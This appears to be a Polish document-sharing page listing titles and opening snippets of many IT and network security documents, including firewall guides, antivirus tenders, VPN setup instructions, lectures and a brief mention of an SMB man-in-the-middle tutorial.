TCP/IP. Warstwa aplikacji. mgr inż. Krzysztof Szałajko

TCP/IP. Warstwa aplikacji. mgr inż. Krzysztof Szałajko TCP/IP Warstwa aplikacji mgr inż. Krzysztof Szałajko Modele odniesienia 7 Aplikacji 6 Prezentacji 5 Sesji 4 Transportowa 3 Sieciowa 2 Łącza danych 1 Fizyczna Aplikacji Transportowa Internetowa Dostępu

Bardziej szczegółowo

Produkty. ESET Produkty

Produkty. ESET Produkty Produkty ESET Produkty czerwiec 2006 COPYRIGHT ArkaNET KATOWICE CZERWIEC 2006 KOPIOWANIE I ROZPOWSZECHNIANIE ZABRONIONE ESET Produkty czerwiec 2006 Wersja dokumentu W dokumencie użyto obrazków zaczerpniętych

Bardziej szczegółowo

Skuteczne rozpoznanie oraz kontrola aplikacji i użytkowników sieci - rozwiązanie Palo Alto Networks

Skuteczne rozpoznanie oraz kontrola aplikacji i użytkowników sieci - rozwiązanie Palo Alto Networks Skuteczne rozpoznanie oraz kontrola aplikacji i użytkowników sieci - rozwiązanie Palo Alto Networks Systemy informatyczne zmieniają się, a wraz z nimi wymagane jest stosowanie środków bezpieczeństwa odpowiednich

Bardziej szczegółowo

Projektowanie zabezpieczeń Centrów Danych oraz innych systemów informatycznych o podwyższonych wymaganiach bezpieczeństwa

Projektowanie zabezpieczeń Centrów Danych oraz innych systemów informatycznych o podwyższonych wymaganiach bezpieczeństwa Projektowanie zabezpieczeń Centrów Danych oraz innych systemów informatycznych o podwyższonych wymaganiach bezpieczeństwa dr inż. Mariusz Stawowski mariusz.stawowski@clico.pl Agenda Wprowadzenie Specyficzne

Bardziej szczegółowo

Numer ogłoszenia: 117195-2012; data zamieszczenia: 28.05.2012

Numer ogłoszenia: 117195-2012; data zamieszczenia: 28.05.2012 Ogłoszenie powiązane: Ogłoszenie nr 111915-2012 z dnia 2012-05-21 r. Ogłoszenie o zamówieniu - Stalowa Wola 1) Przedmiotem zamówienia jest dostawa oprogramowania antywirusowego, wraz z zaporą, na stacje

Bardziej szczegółowo

Bezpieczeństwo w M875

Bezpieczeństwo w M875 Bezpieczeństwo w M875 1. Reguły zapory sieciowej Funkcje bezpieczeństwa modułu M875 zawierają Stateful Firewall. Jest to metoda filtrowania i sprawdzania pakietów, która polega na analizie nagłówków pakietów

Bardziej szczegółowo

7. zainstalowane oprogramowanie. 8. 9. 10. zarządzane stacje robocze

7. zainstalowane oprogramowanie. 8. 9. 10. zarządzane stacje robocze Specyfikacja oprogramowania do Opis zarządzania przedmiotu i monitorowania zamówienia środowiska Załącznik nr informatycznego 1 do specyfikacji Lp. 1. a) 1. Oprogramowanie oprogramowania i do systemów

Bardziej szczegółowo

Wybrane metody obrony przed atakami Denial of Service Synflood. Przemysław Kukiełka

Wybrane metody obrony przed atakami Denial of Service Synflood. Przemysław Kukiełka Wybrane metody obrony przed atakami Denial of Service Synflood Przemysław Kukiełka agenda Wprowadzenie Podział ataków DoS Zasada działania ataku Synflood Podział metod obrony Omówienie wybranych metod

Bardziej szczegółowo

Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołu ftp.

Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołu ftp. T: Konfiguracja usługi ftp w systemie Windows 8.1. Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołu ftp. FTP (ang. File Transfer Protocol) protokół transferu plików umożliwiający

Bardziej szczegółowo

www.arakis.pl PROJEKT ARAKIS DOŚWIADCZENIA Z OBSERWACJI ZAGROŻEŃ W SIECI Tomasz Grudziecki (CERT Polska / NASK)

www.arakis.pl PROJEKT ARAKIS DOŚWIADCZENIA Z OBSERWACJI ZAGROŻEŃ W SIECI Tomasz Grudziecki (CERT Polska / NASK) PROJEKT ARAKIS DOŚWIADCZENIA Z OBSERWACJI ZAGROŻEŃ W SIECI Tomasz Grudziecki (CERT Polska / NASK) agenda I. opis systemu II. wykrywanie nowych ataków III. ataki aktualne robak PHP IV. open proxy znajdź

Bardziej szczegółowo

SPECYFIKACJA TECHNICZNA. LP. Parametry wymagane Parametry oferowane (pełny opis

SPECYFIKACJA TECHNICZNA. LP. Parametry wymagane Parametry oferowane (pełny opis Załącznik nr 3A do SIWZ DZP-0431-1620/2008 SPECYFIKACJA TECHNICZNA Właściwości systemu zabezpieczeń sieciowych UTM (Unified Threat Management) 1. 2. 3. 4. 5. 6. 7. LP. Parametry wymagane Parametry oferowane

Bardziej szczegółowo

Instalacja serwera zarządzającego F-Secure Policy Manager

Instalacja serwera zarządzającego F-Secure Policy Manager Instalacja serwera zarządzającego F-Secure Policy Manager Serwer zarządzający Policy Manager składa się z dwóch części: Server serwera z którym komunikują się klienci. Console interfejsu graficznego do

Bardziej szczegółowo

CENTRUM OPROGRAMOWANIA

CENTRUM OPROGRAMOWANIA CENTRUM OPROGRAMOWANIA Internet. Ta " " ### $ %on line&# ' Network Wizards (http://www.nw.com( ) * + #, * $ $ # - ) ) " ) "#, " " " $ " #. $ (ang. firewall), dedykowanego do ochrony systemu lokalnego #'$

Bardziej szczegółowo

4. Podstawowa konfiguracja

4. Podstawowa konfiguracja 4. Podstawowa konfiguracja Po pierwszym zalogowaniu się do urządzenia należy zweryfikować poprawność licencji. Można to zrobić na jednym z widżetów panelu kontrolnego. Wstępną konfigurację można podzielić

Bardziej szczegółowo

Instrukcja konfiguracji i uruchamiania połączenia VPN z systemami SAP

Instrukcja konfiguracji i uruchamiania połączenia VPN z systemami SAP Temat Połączenie z systemami SAP z wykorzystaniem połączenia VPN spoza sieci Uczelni Moduł: BASIS Wersja: 0.12 Data: 2009-05-05 Wersja. Data Wprowadzone zmiany Autor zmian 0.1 2007-12-03 Utworzenie dokumentu

Bardziej szczegółowo

Przewodnik technologii ActivCard

Przewodnik technologii ActivCard PROFESJONALNE USŁUGI BEZPIECZEŃSTWA Przewodnik technologii ActivCard Część I. Instalacja i wstępna konfiguracja serwera ActivPack CLICO Centrum Oprogramowania Sp. z o.o., Al. 3-go Maja 7, 30-063 Kraków;

Bardziej szczegółowo

Zadanie.09-1 - OUTSIDE 200. 200. 200.0/24. dmz. outside 192. 168.1.0/24. security- level 50 176.16.0.0/16

Zadanie.09-1 - OUTSIDE 200. 200. 200.0/24. dmz. outside 192. 168.1.0/24. security- level 50 176.16.0.0/16 ASDM - Adaptive Security Device Manager (pix) HTTP Device Manager (switch) SSH (pix), TELNET (switch) Schemat sieci OUTSIDE 200. 200. 200.0/24 outside security- level 0 192. 168.1.0/24 dmz security- level

Bardziej szczegółowo

Wymagania techniczne dla programów antywirusowych. Oprogramowanie dla serwerów i stacji roboczych będących w sieci - ilość 450 sztuk:

Wymagania techniczne dla programów antywirusowych. Oprogramowanie dla serwerów i stacji roboczych będących w sieci - ilość 450 sztuk: Nr Sprawy KP- 42 /2006 Załącznik nr 1 Do Specyfikacji Istotnych Warunków Zamówienia Wymagania techniczne dla programów antywirusowych Oprogramowanie dla serwerów i stacji roboczych będących w sieci - ilość

Bardziej szczegółowo

Zanim zaczniesz. Warto ustawić kartę sieciową naszego serwera.

Zanim zaczniesz. Warto ustawić kartę sieciową naszego serwera. Zanim zaczniesz. Warto ustawić kartę sieciową naszego serwera. Wchodzimy w Centrum sieci -> Połączenia sieciowe -> następnie do właściwości naszej karty sieciowej. Następnie przechodzimy do Protokół internetowy

Bardziej szczegółowo

Instalacja NOD32 Remote Administrator

Instalacja NOD32 Remote Administrator Instalacja NOD32 Remote Administrator Program do zdalnego zarządzania stacjami roboczymi, na których zainstalowany jest program NOD32, składa się z dwóch modułów. Pierwszy z nich Remote Administrator Server

Bardziej szczegółowo

Zabezpieczanie systemu Windows

Zabezpieczanie systemu Windows Zabezpieczanie systemu Windows Błażej Miga blazej.miga@man.poznan.pl Zespół Bezpieczeństwa PCSS Microsoft Innovation Center 1 Plan wystąpienia Bezpieczny system - cechy Zabezpieczanie stacji klienckiej.

Bardziej szczegółowo

Załącznik nr 1 I. Założenia ogólne:

Załącznik nr 1 I. Założenia ogólne: Załącznik nr 1 do zapytania ofertowego na: dostawę oprogramowania do ochrony stacji roboczych Windows i oprogramowania zabezpieczającego serwery linux wraz z centralną konsolą zarządzającą I. Założenia

Bardziej szczegółowo

Jarosław Kuchta Administrowanie Systemami Komputerowymi. Internetowe Usługi Informacyjne

Jarosław Kuchta Administrowanie Systemami Komputerowymi. Internetowe Usługi Informacyjne Jarosław Kuchta Internetowe Usługi Informacyjne Komponenty IIS HTTP.SYS serwer HTTP zarządzanie połączeniami TCP/IP buforowanie odpowiedzi obsługa QoS (Quality of Service) obsługa plików dziennika IIS

Bardziej szczegółowo

7. Konfiguracja zapory (firewall)

7. Konfiguracja zapory (firewall) 7. Konfiguracja zapory (firewall) Konfiguracja firewalla w rozwiązaniach NETASQ podzielona jest na dwie części. Pierwszą z nich są reguły domyślne a drugą polityki konfigurowane przez administratora. W

Bardziej szczegółowo

Marek Krauze Marek.Krauze@clico.pl

Marek Krauze Marek.Krauze@clico.pl Przeglądarka - juŝ nie najsłabsze ogniwo - laboratorium technologii WebCheck Marek Krauze Marek.Krauze@clico.pl Plan wystąpienia Wprowadzenie Statystyki incydentów bezpieczeństwa Typowe zagroŝenia związane

Bardziej szczegółowo

Wstęp... ix. 1 Omówienie systemu Microsoft Windows Small Business Server 2008... 1

Wstęp... ix. 1 Omówienie systemu Microsoft Windows Small Business Server 2008... 1 Spis treści Wstęp... ix 1 Omówienie systemu Microsoft Windows Small Business Server 2008... 1 Składniki systemu Windows SBS 2008... 1 Windows Server 2008 Standard... 2 Exchange Server 2007 Standard...

Bardziej szczegółowo

Wykład 3 / Wykład 4. Na podstawie CCNA Exploration Moduł 3 streszczenie Dr inż. Robert Banasiak

Wykład 3 / Wykład 4. Na podstawie CCNA Exploration Moduł 3 streszczenie Dr inż. Robert Banasiak Wykład 3 / Wykład 4 Na podstawie CCNA Exploration Moduł 3 streszczenie Dr inż. Robert Banasiak 1 Wprowadzenie do Modułu 3 CCNA-E Funkcje trzech wyższych warstw modelu OSI W jaki sposób ludzie wykorzystują

Bardziej szczegółowo

Wymagania techniczne infrastruktury IT potrzebne do uruchomienia i pracy ServiceDesk Plus

Wymagania techniczne infrastruktury IT potrzebne do uruchomienia i pracy ServiceDesk Plus Wymagania techniczne infrastruktury IT potrzebne do uruchomienia i pracy ServiceDesk Plus Status: Tajemnica handlowa Wersja z dnia: 23 października 2013 Strona: 1 z 8 SPIS TREŚCI 1. Wymagania dla serwera

Bardziej szczegółowo

Wojciech Dworakowski. Zabezpieczanie aplikacji. Firewalle aplikacyjne - internetowych

Wojciech Dworakowski. Zabezpieczanie aplikacji. Firewalle aplikacyjne - internetowych Firewalle aplikacyjne - Zabezpieczanie aplikacji internetowych Wojciech Dworakowski Agenda Dlaczego tradycyjne mechanizmy nie wystarczają? Wykorzystanie zaawansowanych firewalli Firewalle aplikacyjne architektura

Bardziej szczegółowo

Wykład Nr 4. 1. Sieci bezprzewodowe 2. Monitorowanie sieci - polecenia

Wykład Nr 4. 1. Sieci bezprzewodowe 2. Monitorowanie sieci - polecenia Sieci komputerowe Wykład Nr 4 1. Sieci bezprzewodowe 2. Monitorowanie sieci - polecenia Sieci bezprzewodowe Sieci z bezprzewodowymi punktami dostępu bazują na falach radiowych. Punkt dostępu musi mieć

Bardziej szczegółowo

Poziomy wymagań Konieczny K Podstawowy- P Rozszerzający- R Dopełniający- D Uczeń: - zna rodzaje sieci - zna topologie sieciowe sieci

Poziomy wymagań Konieczny K Podstawowy- P Rozszerzający- R Dopełniający- D Uczeń: - zna rodzaje sieci - zna topologie sieciowe sieci WYMAGANIA EDUKACYJNE PRZEDMIOT: Administracja sieciowymi systemami operacyjnymi NUMER PROGRAMU NAUCZANIA (ZAKRES): 351203 1. Lp Dział programu Sieci komputerowe Poziomy wymagań Konieczny K Podstawowy-

Bardziej szczegółowo

PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA

PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA Portale SSL VPN nowe możliwości dla biznesu Mariusz Stawowski, CISSP Efektywne prowadzenie biznesu wymaga swobodnego dostępu do informacji. Firmy starają się sprostać

Bardziej szczegółowo

Instrukcja podłączenia bramki IP 1R+L oraz IP 2R+L w trybie serwisowym za pomocą usługi telnet.

Instrukcja podłączenia bramki IP 1R+L oraz IP 2R+L w trybie serwisowym za pomocą usługi telnet. Tryb serwisowy Instrukcja podłączenia bramki IP 1R+L oraz IP 2R+L w trybie serwisowym za pomocą usługi telnet. Bramka IP 2R+L oraz IP 1 R+L może zostać uruchomiana w trybie serwisowym. W przypadku wystąpienia

Bardziej szczegółowo

Instrukcja obsługi serwera FTP v.28.12.2010

Instrukcja obsługi serwera FTP v.28.12.2010 Instrukcja obsługi serwera FTP v.28.12.2010 1. Dostęp klienta do konta FTP 1.1. Wprowadzić do przeglądarki adres ftp://87.204.185.42 lub alternatywny adres IP ftp://82.11.1160.114 1.2. Wprowadzić nazwę

Bardziej szczegółowo

Generacja paczki instalacyjnej F-Secure Client Security/Client Security Premium

Generacja paczki instalacyjnej F-Secure Client Security/Client Security Premium Generacja paczki instalacyjnej F-Secure Client Security/Client Security Premium W celu zainstalowania oprogramowania F-Secure Client Security na stacjach końcowych, należy przy pomocy konsoli zarządzającej

Bardziej szczegółowo

Metodologia ochrony informacji w systemach klasy desktop oraz na urządzeniach przenośnych

Metodologia ochrony informacji w systemach klasy desktop oraz na urządzeniach przenośnych Metodologia ochrony informacji w systemach klasy desktop oraz na urządzeniach przenośnych Krzysztof Młynarski (krzysztof.mlynarski@teleinformatica.com.pl) Teleinformatica Pomimo występowania bardzo wielu

Bardziej szczegółowo

Opis komunikacji na potrzeby integracji z systemem klienta (12 kwiecień, 2007)

Opis komunikacji na potrzeby integracji z systemem klienta (12 kwiecień, 2007) Opis komunikacji na potrzeby integracji z systemem klienta (12 kwiecień, 2007) Copyright 2004 Anica System S.A., Lublin, Poland Poniższy dokument, jak również informacje w nim zawarte są całkowitą własnością

Bardziej szczegółowo

Jarosław Kuchta Administrowanie Systemami Komputerowymi. Dostęp zdalny

Jarosław Kuchta Administrowanie Systemami Komputerowymi. Dostęp zdalny Jarosław Kuchta Dostęp zdalny Zagadnienia Infrastruktura VPN Protokoły VPN Scenariusz zastosowania wirtualnej sieci prywatnej Menedżer połączeń Dostęp zdalny 2 Infrastruktura VPN w WS 2008 Klient VPN Windows

Bardziej szczegółowo

Rys. 1. Widok uruchomienia polecenia apt-get install build-essential. Rys. 2. Widok uruchomienia polecenia apt-get install apache2

Rys. 1. Widok uruchomienia polecenia apt-get install build-essential. Rys. 2. Widok uruchomienia polecenia apt-get install apache2 1. Instalacja serwera WWW Aby zainstalować serwer WWW w systemie Linux, należy wykorzystać menedżer pakietów apt-get. Polecenia które należy wpisać w terminalu użytkownika root 1 : apt-get install build-essential

Bardziej szczegółowo

PORADNIKI. Atak SMB Man-In-The-Middle

PORADNIKI. Atak SMB Man-In-The-Middle PORADNIKI Atak SMB Man-In-The-Middle Atak SMB Man-In-The-Middle Ponieważ system Windows automatycznie próbuje się zalogować jako bieżący użytkownik,jeśli żadna inna informacja uwierzytelniania nie jest

Bardziej szczegółowo

Panda Managed Office Protection. Przewodnik. Panda Managed Office Protection. Przewodnik

Panda Managed Office Protection. Przewodnik. Panda Managed Office Protection. Przewodnik Panda Managed Office Protection. Przewodnik Panda Managed Office Protection Przewodnik Maj 2008 Spis treści 1. Przewodnik po konsoli administracyjnej i monitorującej... 3 1.1. Przegląd konsoli... 3 1.2.

Bardziej szczegółowo

Konfiguracja oprogramowania w systemach MS Windows dla kont z ograniczonymi uprawnieniami

Konfiguracja oprogramowania w systemach MS Windows dla kont z ograniczonymi uprawnieniami Konfiguracja oprogramowania w systemach MS Windows dla kont z ograniczonymi uprawnieniami Dotyczy programów opartych na bazie Firebird: System Obsługi Zleceń PL+ Grafik Urlopowy PL+ Zarządzanie Szkoleniami

Bardziej szczegółowo

Funkcjonalność ochrony przed intruzami w urządzeniach UTM oraz specjalizowanych rozwiązaniach zabezpieczeń IPS

Funkcjonalność ochrony przed intruzami w urządzeniach UTM oraz specjalizowanych rozwiązaniach zabezpieczeń IPS Funkcjonalność ochrony przed intruzami w urządzeniach UTM oraz specjalizowanych rozwiązaniach zabezpieczeń IPS Produkty zabezpieczeń typu UTM (ang. unified threat management) to urządzenia, w których zawarte

Bardziej szczegółowo

Przekierowanie portów w routerze TP-LINK na przykładzie kamery Kenik. Po co wykonujemy przekierowanie portów? Spójrzmy na rysunek poniżej:

Przekierowanie portów w routerze TP-LINK na przykładzie kamery Kenik. Po co wykonujemy przekierowanie portów? Spójrzmy na rysunek poniżej: Przekierowanie portów w routerze TP-LINK na przykładzie kamery Kenik Po co wykonujemy przekierowanie portów? Spójrzmy na rysunek poniżej: Router jest podłączony do sieci Internet, natomiast od dostawcy

Bardziej szczegółowo

Przekierowanie portów w routerze TP-LINK na przykładzie kamery Kenik. Po co wykonujemy przekierowanie portów? Spójrzmy na rysunek

Przekierowanie portów w routerze TP-LINK na przykładzie kamery Kenik. Po co wykonujemy przekierowanie portów? Spójrzmy na rysunek Przekierowanie portów w routerze TP-LINK na przykładzie kamery Kenik Po co wykonujemy przekierowanie portów? Spójrzmy na rysunek Router jest podłączony do sieci Internet, natomiast od dostawcy zostaje

Bardziej szczegółowo

CENTRUM OPROGRAMOWANIA

CENTRUM OPROGRAMOWANIA CENTRUM OPROGRAMOWANIA Program realizacji kompleksowego audytu bezpieczeństwa systemu informatycznego Opracował: Konsultacje: Mariusz Stawowski dr Janusz Jarosz, Tomasz Ryś Cel audytu bezpieczeństwa Utrzymywanie

Bardziej szczegółowo

OPIS PRZEDMIOTU ZAMÓWIENIA. Dotyczy postępowania : Zakup licencji na system zabezpieczeń dla Urzędu Miejskiego w Gliwicach.

OPIS PRZEDMIOTU ZAMÓWIENIA. Dotyczy postępowania : Zakup licencji na system zabezpieczeń dla Urzędu Miejskiego w Gliwicach. Załącznik nr 5 SIWZ OPIS PRZEDMIOTU ZAMÓWIENIA Dotyczy postępowania : Zakup licencji na system zabezpieczeń dla Urzędu Miejskiego w Gliwicach. Opis minimalnych wymagań systemu spełniających warunki zamówienia:

Bardziej szczegółowo

Instalacja, konfiguracja i zarządzanie Websense Enterprise for FireWall-1

Instalacja, konfiguracja i zarządzanie Websense Enterprise for FireWall-1 PROFESJONALNE USŁUGI BEZPIECZEŃSTWA Instalacja, konfiguracja i zarządzanie Websense Enterprise for FireWall-1 CLICO Centrum Oprogramowania Sp. z o.o., Al. 3-go Maja 7, 30-063 Kraków; Tel: 12 6325166; 12

Bardziej szczegółowo

Wyciąg z ogólnej analizy ataków na witryny administracji państwowej RP w okresie 21 25 stycznia 2012r.

Wyciąg z ogólnej analizy ataków na witryny administracji państwowej RP w okresie 21 25 stycznia 2012r. Wyciąg z ogólnej analizy ataków na witryny administracji państwowej RP w okresie 21 25 stycznia 2012r. W dniach 21 25 stycznia 2012 miał miejsce szereg ataków na zasoby instytucji administracji państwowej,

Bardziej szczegółowo

Wykaz zmian w programie SysLoger

Wykaz zmian w programie SysLoger Wykaz zmian w programie SysLoger Pierwsza wersja programu 1.0.0.1 powstała we wrześniu 2011. Funkcjonalność pierwszej wersji programu: 1. Zapis logów do pliku tekstowego, 2. Powiadamianie e-mail tylko

Bardziej szczegółowo

Instrukcja konfiguracji usługi DDNS na dedykowanym serwerze dla urządzeń Internec serii i7

Instrukcja konfiguracji usługi DDNS na dedykowanym serwerze dla urządzeń Internec serii i7 Instrukcja konfiguracji usługi DDNS na dedykowanym serwerze dla urządzeń Internec serii i7 Dotyczy urządzeń: Rejestratory: i7-x76xx i7-n95xx i7-n06xx i7-x07xx i7-x08xx i7-x09xx i7-d72xx i7-d72fxx Kamery:

Bardziej szczegółowo

Rozdział 6 - Z kim się kontaktować - 199 - Spis treści. Wszelkie prawa zastrzeżone WiedzaTech sp. z o.o. 2012. Kopiowanie bez zezwolenia zabronione.

Rozdział 6 - Z kim się kontaktować - 199 - Spis treści. Wszelkie prawa zastrzeżone WiedzaTech sp. z o.o. 2012. Kopiowanie bez zezwolenia zabronione. Rozdział 6 - Z kim się kontaktować - 199 - Spis treści - 200 - Rozdział 6 - Z kim się kontaktować Spis treści Rozdział 1: Podstawy bezpiecznego użytkowania komputera... - 3 - Dlaczego należy aktualizować

Bardziej szczegółowo

ZASADY KORZYSTANIA Z PLIKÓW COOKIES ORAZ POLITYKA PRYWATNOŚCI W SERWISIE INTERNETOWYM PawłowskiSPORT.pl

ZASADY KORZYSTANIA Z PLIKÓW COOKIES ORAZ POLITYKA PRYWATNOŚCI W SERWISIE INTERNETOWYM PawłowskiSPORT.pl ZASADY KORZYSTANIA Z PLIKÓW COOKIES ORAZ POLITYKA PRYWATNOŚCI W SERWISIE INTERNETOWYM PawłowskiSPORT.pl Niniejsze zasady dotyczą wszystkich Użytkowników strony internetowej funkcjonującej w domenie http://www.pawlowskisport.pl,

Bardziej szczegółowo

Zmieniona Tabela nr 1a - Oprogramowanie antywirusowe. Parametry wymagane przez Zamawiającego

Zmieniona Tabela nr 1a - Oprogramowanie antywirusowe. Parametry wymagane przez Zamawiającego Zmieniona Tabela nr 1a - Oprogramowanie antywirusowe Lp. Parametry wymagane przez Zamawiającego (nazwa oferowanego oprogramowania) Parametry oferowane przez Wykonawcę (TAK- parametry zgodne z wymaganymi

Bardziej szczegółowo

Administrowanie sieciowymi systemami operacyjnymi

Administrowanie sieciowymi systemami operacyjnymi REFORMA 2012 Administrowanie sieciowymi systemami operacyjnymi Krzysztof Pytel, Sylwia Osetek Kwalifikacja E.13.3 Podręcznik do nauki zawodu TECHNIK INFORMATYK Administrowanie.indd 1 2012-12-27 16:44:39

Bardziej szczegółowo

Systemy ochrony komputerów osobistych Opis programu Sygate Personal Firewall v.5.5.

Systemy ochrony komputerów osobistych Opis programu Sygate Personal Firewall v.5.5. Systemy ochrony komputerów osobistych Opis programu Sygate Personal Firewall v.5.5. W ostatnich latach dostrzeżono konieczność ochrony komputerów osobistych. Zwykle nie przechowuje się na nich strategicznych

Bardziej szczegółowo

Wszechstronne urządzenie. z wbudowanymi wszystkimi funkcjami. zapory ogniowej i technologiami. zabezpieczeń. Symantec Gateway Security SERIA 5400

Wszechstronne urządzenie. z wbudowanymi wszystkimi funkcjami. zapory ogniowej i technologiami. zabezpieczeń. Symantec Gateway Security SERIA 5400 Wszechstronne urządzenie z wbudowanymi wszystkimi funkcjami zapory ogniowej i technologiami zabezpieczeń Symantec Gateway Security SERIA 5400 W obliczu nowoczesnych, wyrafinowanych zagrożeń bezpieczeństwa

Bardziej szczegółowo

Instrukcja konfigurowania poczty Exchange dla klienta pocztowego użytkowanego poza siecią uczelnianą SGH.

Instrukcja konfigurowania poczty Exchange dla klienta pocztowego użytkowanego poza siecią uczelnianą SGH. Instrukcja konfigurowania poczty Exchange dla klienta pocztowego użytkowanego poza siecią uczelnianą SGH. Spis treści 1. Konfiguracja poczty Exchange dla klienta pocztowego Outlook 2007 protokół Exchange

Bardziej szczegółowo

Wykład 2: Budowanie sieci lokalnych. A. Kisiel, Budowanie sieci lokalnych

Wykład 2: Budowanie sieci lokalnych. A. Kisiel, Budowanie sieci lokalnych Wykład 2: Budowanie sieci lokalnych 1 Budowanie sieci lokalnych Technologie istotne z punktu widzenia konfiguracji i testowania poprawnego działania sieci lokalnej: Protokół ICMP i narzędzia go wykorzystujące

Bardziej szczegółowo

Najczęściej występujące problemy z instalacją i konfiguracją i ich rozwiązania.

Najczęściej występujące problemy z instalacją i konfiguracją i ich rozwiązania. Najczęściej występujące problemy z instalacją i konfiguracją i ich rozwiązania. Q. Jak uruchomić instalator? A. Trzeba nadać instalatorowi atrybut 'wykonywalny'. Można to zrobić wydając polecenie `chmod

Bardziej szczegółowo

INSTALACJA I KONFIGURACJA. 1.1. Instalacja systemu WF-Mag Mobile 2

INSTALACJA I KONFIGURACJA. 1.1. Instalacja systemu WF-Mag Mobile 2 INSTALACJA I KONFIGURACJA 1.1. Instalacja systemu WF-Mag Mobile 2 System WF-Mag Mobile 2 dostępny jest na jednej płycie instalacyjnej wraz z innymi aplikacjami Asseco WAPRO. Oprócz aplikacji wchodzących

Bardziej szczegółowo

Usługi sieciowe systemu Linux

Usługi sieciowe systemu Linux Usługi sieciowe systemu Linux 1. Serwer WWW Najpopularniejszym serwerem WWW jest Apache, dostępny dla wielu platform i rozprowadzany w pakietach httpd. Serwer Apache bardzo często jest wykorzystywany do

Bardziej szczegółowo

Problemy z bezpieczeństwem w sieci lokalnej

Problemy z bezpieczeństwem w sieci lokalnej Problemy z bezpieczeństwem w sieci lokalnej możliwości podsłuchiwania/przechwytywania ruchu sieciowego pakiet dsniff demonstracja kilku narzędzi z pakietu dsniff metody przeciwdziałania Podsłuchiwanie

Bardziej szczegółowo

Przypisywanie adresów IP do MAC-adresów

Przypisywanie adresów IP do MAC-adresów Przypisywanie adresów IP do MAC-adresów Aby skutecznie korzystać z reguł Firewalla, należy najpierw przypisać adresy IP do MACadresów kart sieciowych komputerów w sieci LAN. Załóżmy, że router posiada

Bardziej szczegółowo

WYMAGANE PARAMETRY TECHNICZNE OFEROWANYCH URZĄDZEŃ ZABEZPIECZAJĄCYCH

WYMAGANE PARAMETRY TECHNICZNE OFEROWANYCH URZĄDZEŃ ZABEZPIECZAJĄCYCH Załącznik nr 3 Do SIWZ DZP-0431-550/2009 WYMAGANE PARAMETRY TECHNICZNE OFEROWANYCH URZĄDZEŃ ZABEZPIECZAJĄCYCH 1 typ urządzenia zabezpieczającego Wymagane parametry techniczne Oferowane parametry techniczne

Bardziej szczegółowo

System Kancelaris. Zdalny dostęp do danych

System Kancelaris. Zdalny dostęp do danych Kancelaris krok po kroku System Kancelaris Zdalny dostęp do danych Data modyfikacji: 2008-07-10 Z czego składaj adają się systemy informatyczne? System Kancelaris składa się z dwóch części: danych oprogramowania,

Bardziej szczegółowo